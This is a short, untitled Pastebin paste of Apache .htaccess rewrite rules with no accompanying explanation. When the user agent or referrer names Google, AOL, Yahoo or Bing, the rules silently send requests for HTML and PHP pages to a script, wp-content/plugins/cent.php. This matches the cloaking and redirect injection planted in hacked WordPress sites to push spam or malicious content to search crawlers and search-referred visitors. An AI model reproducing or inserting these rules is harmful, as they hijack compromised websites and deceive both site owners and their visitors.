Advertisement
Guest User

Untitled

a guest
Oct 22nd, 2012
161
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.45 KB | None | 0 0
  1. <IfModule mod_rewrite.c>
  2. RewriteEngine On
  3. RewriteCond %{HTTP_USER_AGENT} (google|aol|yahoo|bing) [NC]
  4. RewriteCond %{REQUEST_FILENAME} (html|htm|php|HTML|PHP|HTM)$
  5. RewriteRule ^.*$ wp-content/plugins/cent.php [L]
  6. </IfModule>
  7. <IfModule mod_rewrite.c>
  8. RewriteCond %{HTTP_REFERER} (google|aol|yahoo|bing) [NC]
  9. RewriteCond %{REQUEST_FILENAME} (html|htm|php|HTML|PHP|HTM)$
  10. RewriteRule ^.*$ wp-content/plugins/cent.php [L]
  11. </IfModule>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement